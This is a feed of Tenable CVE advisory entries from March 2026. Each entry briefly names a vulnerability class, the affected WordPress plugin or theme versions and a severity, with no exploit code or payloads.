]]> https://www.tenable.com/cve/CVE-2026-32447 https://www.tenable.com/cve/CVE-2026-32447 Fri, 13 Mar 2026 19:55:05 GMT Medium Severity

Description

Missing Authorization vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Atarim: from n/a through <= 4.3.2.

Read more at https://www.tenable.com/cve/CVE-2026-32447

]]> https://www.tenable.com/cve/CVE-2026-32446 https://www.tenable.com/cve/CVE-2026-32446 Fri, 13 Mar 2026 19:55:05 GMT Medium Severity

Description

Missing Authorization vulnerability in Syed Balkhi Contact Form by WPForms wpforms-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form by WPForms: from n/a through <= 1.9.9.3.

Read more at https://www.tenable.com/cve/CVE-2026-32446

]]> https://www.tenable.com/cve/CVE-2026-32445 https://www.tenable.com/cve/CVE-2026-32445 Fri, 13 Mar 2026 19:55:05 GMT Low Severity

Description

Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elementor Website Builder: from n/a through <= 3.35.5.

Read more at https://www.tenable.com/cve/CVE-2026-32445

]]> https://www.tenable.com/cve/CVE-2026-32443 https://www.tenable.com/cve/CVE-2026-32443 Fri, 13 Mar 2026 19:55:04 GMT Medium Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in Josh Kohlbach Product Feed PRO for WooCommerce woo-product-feed-pro allows Cross Site Request Forgery.This issue affects Product Feed PRO for WooCommerce: from n/a through <= 13.5.2.

Read more at https://www.tenable.com/cve/CVE-2026-32443

]]> https://www.tenable.com/cve/CVE-2026-32442 https://www.tenable.com/cve/CVE-2026-32442 Fri, 13 Mar 2026 19:55:04 GMT Medium Severity

Description

Missing Authorization vulnerability in E2Pdf e2pdf e2pdf allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects e2pdf: from n/a through <= 1.28.15.

Read more at https://www.tenable.com/cve/CVE-2026-32442

]]> https://www.tenable.com/cve/CVE-2026-32440 https://www.tenable.com/cve/CVE-2026-32440 Fri, 13 Mar 2026 19:55:04 GMT Medium Severity

Description

Missing Authorization vulnerability in Ex-Themes WP Food wp-food allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Food: from n/a through < 2.7.1.

Read more at https://www.tenable.com/cve/CVE-2026-32440

]]> https://www.tenable.com/cve/CVE-2026-32439 https://www.tenable.com/cve/CVE-2026-32439 Fri, 13 Mar 2026 19:55:04 GMT Medium Severity

Description

Missing Authorization vulnerability in WebGeniusLab BigHearts bighearts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BigHearts: from n/a through <= 3.1.14.

Read more at https://www.tenable.com/cve/CVE-2026-32439

]]> https://www.tenable.com/cve/CVE-2026-32438 https://www.tenable.com/cve/CVE-2026-32438 Fri, 13 Mar 2026 19:55:04 GMT Medium Severity

Description

Missing Authorization vulnerability in vowelweb VW School Education vw-school-education allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW School Education: from n/a through <= 1.4.6.

Read more at https://www.tenable.com/cve/CVE-2026-32438

]]> https://www.tenable.com/cve/CVE-2026-32437 https://www.tenable.com/cve/CVE-2026-32437 Fri, 13 Mar 2026 19:55:03 GMT Medium Severity

Description

Missing Authorization vulnerability in vowelweb VW Portfolio vw-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Portfolio: from n/a through <= 1.3.3.

Read more at https://www.tenable.com/cve/CVE-2026-32437

]]> https://www.tenable.com/cve/CVE-2026-32436 https://www.tenable.com/cve/CVE-2026-32436 Fri, 13 Mar 2026 19:55:03 GMT Medium Severity

Description

Missing Authorization vulnerability in vowelweb VW Photography vw-photography allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Photography: from n/a through <= 1.3.8.

Read more at https://www.tenable.com/cve/CVE-2026-32436

]]> https://www.tenable.com/cve/CVE-2026-32435 https://www.tenable.com/cve/CVE-2026-32435 Fri, 13 Mar 2026 19:55:03 GMT Medium Severity

Description

Missing Authorization vulnerability in vowelweb VW Pet Shop vw-pet-shop allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Pet Shop: from n/a through <= 1.4.7.

Read more at https://www.tenable.com/cve/CVE-2026-32435

]]> https://www.tenable.com/cve/CVE-2026-32434 https://www.tenable.com/cve/CVE-2026-32434 Fri, 13 Mar 2026 19:55:03 GMT Medium Severity

Description

Missing Authorization vulnerability in vowelweb VW Fitness vw-fitness allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Fitness: from n/a through <= 4.3.4.

Read more at https://www.tenable.com/cve/CVE-2026-32434

]]> https://www.tenable.com/cve/CVE-2026-32433 https://www.tenable.com/cve/CVE-2026-32433 Fri, 13 Mar 2026 19:55:02 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in codepeople CP Contact Form with Paypal cp-contact-form-with-paypal allows Blind SQL Injection.This issue affects CP Contact Form with Paypal: from n/a through <= 1.3.61.

Read more at https://www.tenable.com/cve/CVE-2026-32433

]]> https://www.tenable.com/cve/CVE-2026-32432 https://www.tenable.com/cve/CVE-2026-32432 Fri, 13 Mar 2026 19:55:02 GMT Medium Severity

Description

Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.42.

Read more at https://www.tenable.com/cve/CVE-2026-32432

]]> https://www.tenable.com/cve/CVE-2026-32431 https://www.tenable.com/cve/CVE-2026-32431 Fri, 13 Mar 2026 19:55:02 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Astra Bulk Edit astra-bulk-edit allows DOM-Based XSS.This issue affects Astra Bulk Edit: from n/a through <= 1.2.10.

Read more at https://www.tenable.com/cve/CVE-2026-32431

]]> https://www.tenable.com/cve/CVE-2026-32430 https://www.tenable.com/cve/CVE-2026-32430 Fri, 13 Mar 2026 19:55:02 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IdeaBox Creations PowerPack Addons for Elementor powerpack-lite-for-elementor allows Stored XSS.This issue affects PowerPack Addons for Elementor: from n/a through <= 2.9.9.

Read more at https://www.tenable.com/cve/CVE-2026-32430

]]> https://www.tenable.com/cve/CVE-2026-32429 https://www.tenable.com/cve/CVE-2026-32429 Fri, 13 Mar 2026 19:55:01 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noor Alam Magical Addons For Elementor magical-addons-for-elementor allows Stored XSS.This issue affects Magical Addons For Elementor: from n/a through <= 1.4.1.

Read more at https://www.tenable.com/cve/CVE-2026-32429

]]> https://www.tenable.com/cve/CVE-2026-32428 https://www.tenable.com/cve/CVE-2026-32428 Fri, 13 Mar 2026 19:55:01 GMT Medium Severity

Description

Missing Authorization vulnerability in Ays Pro Popup Like box ays-facebook-popup-likebox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Like box: from n/a through <= 3.7.7.

Read more at https://www.tenable.com/cve/CVE-2026-32428

]]> https://www.tenable.com/cve/CVE-2026-32427 https://www.tenable.com/cve/CVE-2026-32427 Fri, 13 Mar 2026 19:55:01 GMT Medium Severity

Description

Missing Authorization vulnerability in vowelweb VW Education Lite vw-education-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Education Lite: from n/a through <= 2.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-32427

]]> https://www.tenable.com/cve/CVE-2026-32426 https://www.tenable.com/cve/CVE-2026-32426 Fri, 13 Mar 2026 19:55:00 GMT High Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in themelexus Medilazar Core medilazar-core allows PHP Local File Inclusion.This issue affects Medilazar Core: from n/a through < 1.4.7.

Read more at https://www.tenable.com/cve/CVE-2026-32426

]]> https://www.tenable.com/cve/CVE-2026-32425 https://www.tenable.com/cve/CVE-2026-32425 Fri, 13 Mar 2026 19:55:00 GMT Medium Severity

Description

Missing Authorization vulnerability in linknacional Payment Gateway Pix For GiveWP payment-gateway-pix-for-givewp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway Pix For GiveWP: from n/a through <= 2.2.3.

Read more at https://www.tenable.com/cve/CVE-2026-32425

]]> https://www.tenable.com/cve/CVE-2026-32424 https://www.tenable.com/cve/CVE-2026-32424 Fri, 13 Mar 2026 19:55:00 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldGrid Sprout Clients sprout-clients allows Stored XSS.This issue affects Sprout Clients: from n/a through <= 3.2.2.

Read more at https://www.tenable.com/cve/CVE-2026-32424

]]> https://www.tenable.com/cve/CVE-2026-32423 https://www.tenable.com/cve/CVE-2026-32423 Fri, 13 Mar 2026 19:55:00 GMT Medium Severity

Description

Missing Authorization vulnerability in Bowo Admin and Site Enhancements (ASE) admin-site-enhancements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Admin and Site Enhancements (ASE): from n/a through <= 8.4.0.

Read more at https://www.tenable.com/cve/CVE-2026-32423

]]> https://www.tenable.com/cve/CVE-2026-32422 https://www.tenable.com/cve/CVE-2026-32422 Fri, 13 Mar 2026 19:55:00 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Blind SQL Injection.This issue affects WP EasyCart: from n/a through <= 5.8.13.

Read more at https://www.tenable.com/cve/CVE-2026-32422

]]> https://www.tenable.com/cve/CVE-2026-32421 https://www.tenable.com/cve/CVE-2026-32421 Fri, 13 Mar 2026 19:54:59 GMT Medium Severity

Description

Missing Authorization vulnerability in Agile Logix Post Timeline post-timeline allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Timeline: from n/a through <= 2.4.1.

Read more at https://www.tenable.com/cve/CVE-2026-32421

]]> https://www.tenable.com/cve/CVE-2026-32420 https://www.tenable.com/cve/CVE-2026-32420 Fri, 13 Mar 2026 19:54:59 GMT Medium Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in Ruben Garcia GamiPress gamipress allows Cross Site Request Forgery.This issue affects GamiPress: from n/a through <= 7.6.6.

Read more at https://www.tenable.com/cve/CVE-2026-32420

]]> https://www.tenable.com/cve/CVE-2026-32419 https://www.tenable.com/cve/CVE-2026-32419 Fri, 13 Mar 2026 19:54:59 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fernando Briano List category posts list-category-posts allows DOM-Based XSS.This issue affects List category posts: from n/a through <= 0.93.1.

Read more at https://www.tenable.com/cve/CVE-2026-32419

]]> https://www.tenable.com/cve/CVE-2026-32418 https://www.tenable.com/cve/CVE-2026-32418 Fri, 13 Mar 2026 19:54:59 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Jordy Meow Meow Gallery meow-gallery allows Blind SQL Injection.This issue affects Meow Gallery: from n/a through <= 5.4.4.

Read more at https://www.tenable.com/cve/CVE-2026-32418

]]> https://www.tenable.com/cve/CVE-2026-32417 https://www.tenable.com/cve/CVE-2026-32417 Fri, 13 Mar 2026 19:54:59 GMT Medium Severity

Description

Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pochipp: from n/a through < 1.18.9.

Read more at https://www.tenable.com/cve/CVE-2026-32417

]]> https://www.tenable.com/cve/CVE-2026-32416 https://www.tenable.com/cve/CVE-2026-32416 Fri, 13 Mar 2026 19:54:58 GMT Medium Severity

Description

Missing Authorization vulnerability in bPlugins PDF Poster pdf-poster allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PDF Poster: from n/a through <= 2.4.0.

Read more at https://www.tenable.com/cve/CVE-2026-32416

]]> https://www.tenable.com/cve/CVE-2026-32415 https://www.tenable.com/cve/CVE-2026-32415 Fri, 13 Mar 2026 19:54:58 GMT High Severity

Description

Path Traversal: '.../...//' vulnerability in Bogdan Bendziukov Squeeze squeeze allows Path Traversal.This issue affects Squeeze: from n/a through <= 1.7.7.

Read more at https://www.tenable.com/cve/CVE-2026-32415

]]> https://www.tenable.com/cve/CVE-2026-32414 https://www.tenable.com/cve/CVE-2026-32414 Fri, 13 Mar 2026 19:54:58 GMT High Severity

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in ILLID Advanced Woo Labels advanced-woo-labels allows Remote Code Inclusion.This issue affects Advanced Woo Labels: from n/a through <= 2.36.

Read more at https://www.tenable.com/cve/CVE-2026-32414

]]> https://www.tenable.com/cve/CVE-2026-32413 https://www.tenable.com/cve/CVE-2026-32413 Fri, 13 Mar 2026 19:54:58 GMT Medium Severity

Description

Missing Authorization vulnerability in Maciej Bis Permalink Manager Lite permalink-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Permalink Manager Lite: from n/a through < 2.5.3.

Read more at https://www.tenable.com/cve/CVE-2026-32413

]]> https://www.tenable.com/cve/CVE-2026-32412 https://www.tenable.com/cve/CVE-2026-32412 Fri, 13 Mar 2026 19:54:58 GMT Medium Severity

Description

Server-Side Request Forgery (SSRF) vulnerability in Gift Up! Gift Up Gift Cards for WordPress and WooCommerce gift-up allows Server Side Request Forgery.This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through <= 3.1.7.

Read more at https://www.tenable.com/cve/CVE-2026-32412

]]> https://www.tenable.com/cve/CVE-2026-32411 https://www.tenable.com/cve/CVE-2026-32411 Fri, 13 Mar 2026 19:54:58 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Simpma Embed Calendly embed-calendly-scheduling allows Stored XSS.This issue affects Embed Calendly: from n/a through <= 4.4.

Read more at https://www.tenable.com/cve/CVE-2026-32411

]]> https://www.tenable.com/cve/CVE-2026-32410 https://www.tenable.com/cve/CVE-2026-32410 Fri, 13 Mar 2026 19:54:57 GMT Medium Severity

Description

Missing Authorization vulnerability in WBW Plugins WBW Currency Switcher for WooCommerce woo-currency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WBW Currency Switcher for WooCommerce: from n/a through <= 2.2.5.

Read more at https://www.tenable.com/cve/CVE-2026-32410

]]> https://www.tenable.com/cve/CVE-2026-32409 https://www.tenable.com/cve/CVE-2026-32409 Fri, 13 Mar 2026 19:54:57 GMT Medium Severity

Description

Missing Authorization vulnerability in WPMU DEV - Your All-in-One WordPress Platform Forminator forminator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Forminator: from n/a through <= 1.50.2.

Read more at https://www.tenable.com/cve/CVE-2026-32409

]]> https://www.tenable.com/cve/CVE-2026-32408 https://www.tenable.com/cve/CVE-2026-32408 Fri, 13 Mar 2026 19:54:57 GMT Medium Severity

Description

Missing Authorization vulnerability in themefusecom Brizy brizy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Brizy: from n/a through <= 2.7.23.

Read more at https://www.tenable.com/cve/CVE-2026-32408

]]> https://www.tenable.com/cve/CVE-2026-32407 https://www.tenable.com/cve/CVE-2026-32407 Fri, 13 Mar 2026 19:54:57 GMT Medium Severity

Description

Missing Authorization vulnerability in WPClever WPC Smart Wishlist for WooCommerce woo-smart-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPC Smart Wishlist for WooCommerce: from n/a through <= 5.0.8.

Read more at https://www.tenable.com/cve/CVE-2026-32407

]]> https://www.tenable.com/cve/CVE-2026-32406 https://www.tenable.com/cve/CVE-2026-32406 Fri, 13 Mar 2026 19:54:57 GMT Medium Severity

Description

Missing Authorization vulnerability in WPClever WPC Product Bundles for WooCommerce woo-product-bundle allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPC Product Bundles for WooCommerce: from n/a through <= 8.4.5.

Read more at https://www.tenable.com/cve/CVE-2026-32406

]]> https://www.tenable.com/cve/CVE-2026-32405 https://www.tenable.com/cve/CVE-2026-32405 Fri, 13 Mar 2026 19:54:56 GMT High Severity

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in xtemos WoodMart woodmart allows Retrieve Embedded Sensitive Data.This issue affects WoodMart: from n/a through <= 8.3.9.

Read more at https://www.tenable.com/cve/CVE-2026-32405

]]> https://www.tenable.com/cve/CVE-2026-32404 https://www.tenable.com/cve/CVE-2026-32404 Fri, 13 Mar 2026 19:54:56 GMT Medium Severity

Description

Missing Authorization vulnerability in Studio99 Studio99 WP Monitor studio99-wp-monitor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Studio99 WP Monitor: from n/a through <= 1.0.3.

Read more at https://www.tenable.com/cve/CVE-2026-32404

]]> https://www.tenable.com/cve/CVE-2026-32403 https://www.tenable.com/cve/CVE-2026-32403 Fri, 13 Mar 2026 19:54:56 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in toocheke Toocheke Companion toocheke-companion allows DOM-Based XSS.This issue affects Toocheke Companion: from n/a through <= 1.194.

Read more at https://www.tenable.com/cve/CVE-2026-32403

]]> https://www.tenable.com/cve/CVE-2026-32402 https://www.tenable.com/cve/CVE-2026-32402 Fri, 13 Mar 2026 19:54:56 GMT Medium Severity

Description

Missing Authorization vulnerability in Ays Pro Image Slider by Ays ays-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Slider by Ays: from n/a through <= 2.7.1.

Read more at https://www.tenable.com/cve/CVE-2026-32402

]]> https://www.tenable.com/cve/CVE-2026-32401 https://www.tenable.com/cve/CVE-2026-32401 Fri, 13 Mar 2026 19:54:56 GMT Critical Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows PHP Local File Inclusion.This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.9.

Read more at https://www.tenable.com/cve/CVE-2026-32401

]]> https://www.tenable.com/cve/CVE-2026-32400 https://www.tenable.com/cve/CVE-2026-32400 Fri, 13 Mar 2026 19:54:55 GMT High Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemetechMount Boldman boldman allows PHP Local File Inclusion.This issue affects Boldman: from n/a through <= 7.7.

Read more at https://www.tenable.com/cve/CVE-2026-32400

]]> https://www.tenable.com/cve/CVE-2026-32399 https://www.tenable.com/cve/CVE-2026-32399 Fri, 13 Mar 2026 19:54:55 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media LIbrary Assistant media-library-assistant allows Blind SQL Injection.This issue affects Media LIbrary Assistant: from n/a through <= 3.32.

Read more at https://www.tenable.com/cve/CVE-2026-32399

]]> https://www.tenable.com/cve/CVE-2026-32398 https://www.tenable.com/cve/CVE-2026-32398 Fri, 13 Mar 2026 19:54:55 GMT High Severity

Description

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Subrata Mal TeraWallet – For WooCommerce woo-wallet allows Leveraging Race Conditions.This issue affects TeraWallet – For WooCommerce: from n/a through <= 1.5.15.

Read more at https://www.tenable.com/cve/CVE-2026-32398

]]> https://www.tenable.com/cve/CVE-2026-32397 https://www.tenable.com/cve/CVE-2026-32397 Fri, 13 Mar 2026 19:54:55 GMT Medium Severity

Description

Missing Authorization vulnerability in YMC Filter & Grids ymc-smart-filter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Filter & Grids: from n/a through <= 3.5.1.

Read more at https://www.tenable.com/cve/CVE-2026-32397

]]> https://www.tenable.com/cve/CVE-2026-32396 https://www.tenable.com/cve/CVE-2026-32396 Fri, 13 Mar 2026 19:54:55 GMT High Severity

Description

Missing Authorization vulnerability in RadiusTheme Team tlp-team allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Team: from n/a through <= 5.0.13.

Read more at https://www.tenable.com/cve/CVE-2026-32396

]]> https://www.tenable.com/cve/CVE-2026-32395 https://www.tenable.com/cve/CVE-2026-32395 Fri, 13 Mar 2026 19:54:55 GMT Medium Severity

Description

Missing Authorization vulnerability in Xpro Xpro Addons For Beaver Builder – Lite xpro-addons-beaver-builder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Xpro Addons For Beaver Builder – Lite: from n/a through <= 1.5.6.

Read more at https://www.tenable.com/cve/CVE-2026-32395

]]> https://www.tenable.com/cve/CVE-2026-32394 https://www.tenable.com/cve/CVE-2026-32394 Fri, 13 Mar 2026 19:54:54 GMT High Severity

Description

Missing Authorization vulnerability in PublishPress PublishPress Capabilities capability-manager-enhanced allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PublishPress Capabilities: from n/a through <= 2.31.0.

Read more at https://www.tenable.com/cve/CVE-2026-32394

]]> https://www.tenable.com/cve/CVE-2026-32393 https://www.tenable.com/cve/CVE-2026-32393 Fri, 13 Mar 2026 19:54:54 GMT Critical Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Creatives_Planet Greenly Theme Addons greenly-addons allows PHP Local File Inclusion.This issue affects Greenly Theme Addons: from n/a through < 8.2.

Read more at https://www.tenable.com/cve/CVE-2026-32393

]]> https://www.tenable.com/cve/CVE-2026-32392 https://www.tenable.com/cve/CVE-2026-32392 Fri, 13 Mar 2026 19:54:54 GMT Critical Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Creatives_Planet Greenly greenly allows PHP Local File Inclusion.This issue affects Greenly: from n/a through <= 8.1.

Read more at https://www.tenable.com/cve/CVE-2026-32392

]]> https://www.tenable.com/cve/CVE-2026-32391 https://www.tenable.com/cve/CVE-2026-32391 Fri, 13 Mar 2026 19:54:54 GMT Medium Severity

Description

Missing Authorization vulnerability in linethemes SmartFix smartfix allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SmartFix: from n/a through < 1.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-32391

]]> https://www.tenable.com/cve/CVE-2026-32390 https://www.tenable.com/cve/CVE-2026-32390 Fri, 13 Mar 2026 19:54:54 GMT High Severity

Description

Missing Authorization vulnerability in linethemes Nanosoft nanosoft allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Nanosoft: from n/a through < 1.3.2.

Read more at https://www.tenable.com/cve/CVE-2026-32390

]]> https://www.tenable.com/cve/CVE-2026-32388 https://www.tenable.com/cve/CVE-2026-32388 Fri, 13 Mar 2026 19:54:54 GMT Medium Severity

Description

Missing Authorization vulnerability in linethemes GLB glb allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GLB: from n/a through <= 1.2.2.

Read more at https://www.tenable.com/cve/CVE-2026-32388

]]> https://www.tenable.com/cve/CVE-2026-32387 https://www.tenable.com/cve/CVE-2026-32387 Fri, 13 Mar 2026 19:54:54 GMT Critical Severity

Description

Missing Authorization vulnerability in Noor Alam Checkout for PayPal checkout-for-paypal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Checkout for PayPal: from n/a through <= 1.0.46.

Read more at https://www.tenable.com/cve/CVE-2026-32387

]]> https://www.tenable.com/cve/CVE-2026-32386 https://www.tenable.com/cve/CVE-2026-32386 Fri, 13 Mar 2026 19:54:53 GMT Medium Severity

Description

Missing Authorization vulnerability in EnvoThemes Envo Extra envo-extra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Envo Extra: from n/a through <= 1.9.13.

Read more at https://www.tenable.com/cve/CVE-2026-32386

]]> https://www.tenable.com/cve/CVE-2026-32385 https://www.tenable.com/cve/CVE-2026-32385 Fri, 13 Mar 2026 19:54:53 GMT High Severity

Description

Missing Authorization vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RegistrationMagic: from n/a through <= 6.0.7.6.

Read more at https://www.tenable.com/cve/CVE-2026-32385

]]> https://www.tenable.com/cve/CVE-2026-32384 https://www.tenable.com/cve/CVE-2026-32384 Fri, 13 Mar 2026 19:54:53 GMT Critical Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magepeopleteam WpBookingly service-booking-manager allows PHP Local File Inclusion.This issue affects WpBookingly: from n/a through <= 1.2.9.

Read more at https://www.tenable.com/cve/CVE-2026-32384

]]> https://www.tenable.com/cve/CVE-2026-32383 https://www.tenable.com/cve/CVE-2026-32383 Fri, 13 Mar 2026 19:54:53 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Ridhi ridhi allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ridhi: from n/a through <= 1.1.2.

Read more at https://www.tenable.com/cve/CVE-2026-32383

]]> https://www.tenable.com/cve/CVE-2026-32382 https://www.tenable.com/cve/CVE-2026-32382 Fri, 13 Mar 2026 19:54:53 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Digital Download digital-download allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Digital Download: from n/a through <= 1.1.4.

Read more at https://www.tenable.com/cve/CVE-2026-32382

]]> https://www.tenable.com/cve/CVE-2026-32381 https://www.tenable.com/cve/CVE-2026-32381 Fri, 13 Mar 2026 19:54:53 GMT High Severity

Description

Missing Authorization vulnerability in raratheme App Landing Page app-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects App Landing Page: from n/a through <= 1.2.2.

Read more at https://www.tenable.com/cve/CVE-2026-32381

]]> https://www.tenable.com/cve/CVE-2026-32380 https://www.tenable.com/cve/CVE-2026-32380 Fri, 13 Mar 2026 19:54:52 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Numinous numinous allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Numinous: from n/a through <= 1.3.0.

Read more at https://www.tenable.com/cve/CVE-2026-32380

]]> https://www.tenable.com/cve/CVE-2026-32379 https://www.tenable.com/cve/CVE-2026-32379 Fri, 13 Mar 2026 19:54:52 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Rara Academic rara-academic allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rara Academic: from n/a through <= 1.2.2.

Read more at https://www.tenable.com/cve/CVE-2026-32379

]]> https://www.tenable.com/cve/CVE-2026-32378 https://www.tenable.com/cve/CVE-2026-32378 Fri, 13 Mar 2026 19:54:52 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Book Landing Page book-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Book Landing Page: from n/a through <= 1.2.7.

Read more at https://www.tenable.com/cve/CVE-2026-32378

]]> https://www.tenable.com/cve/CVE-2026-32377 https://www.tenable.com/cve/CVE-2026-32377 Fri, 13 Mar 2026 19:54:52 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Pranayama Yoga pranayama-yoga allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pranayama Yoga: from n/a through <= 1.2.2.

Read more at https://www.tenable.com/cve/CVE-2026-32377

]]> https://www.tenable.com/cve/CVE-2026-32376 https://www.tenable.com/cve/CVE-2026-32376 Fri, 13 Mar 2026 19:54:52 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Kalon kalon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Kalon: from n/a through <= 1.2.9.

Read more at https://www.tenable.com/cve/CVE-2026-32376

]]> https://www.tenable.com/cve/CVE-2026-32375 https://www.tenable.com/cve/CVE-2026-32375 Fri, 13 Mar 2026 19:54:52 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Travel Diaries travel-diaries allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel Diaries: from n/a through <= 1.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-32375

]]> https://www.tenable.com/cve/CVE-2026-32374 https://www.tenable.com/cve/CVE-2026-32374 Fri, 13 Mar 2026 19:54:51 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme The Minimal the-minimal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Minimal: from n/a through <= 1.2.9.

Read more at https://www.tenable.com/cve/CVE-2026-32374

]]> https://www.tenable.com/cve/CVE-2026-32373 https://www.tenable.com/cve/CVE-2026-32373 Fri, 13 Mar 2026 19:54:51 GMT High Severity

Description

Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Alert Order Notifications: from n/a through <= 3.9.0.

Read more at https://www.tenable.com/cve/CVE-2026-32373

]]> https://www.tenable.com/cve/CVE-2026-32372 https://www.tenable.com/cve/CVE-2026-32372 Fri, 13 Mar 2026 19:54:51 GMT High Severity

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in RadiusTheme ShopBuilder – Elementor WooCommerce Builder Addons shopbuilder allows Retrieve Embedded Sensitive Data.This issue affects ShopBuilder – Elementor WooCommerce Builder Addons: from n/a through <= 3.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-32372

]]> https://www.tenable.com/cve/CVE-2026-32371 https://www.tenable.com/cve/CVE-2026-32371 Fri, 13 Mar 2026 19:54:51 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Elegant Pink elegant-pink allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elegant Pink: from n/a through <= 1.3.3.

Read more at https://www.tenable.com/cve/CVE-2026-32371

]]> https://www.tenable.com/cve/CVE-2026-32370 https://www.tenable.com/cve/CVE-2026-32370 Fri, 13 Mar 2026 19:54:51 GMT Medium Severity

Description

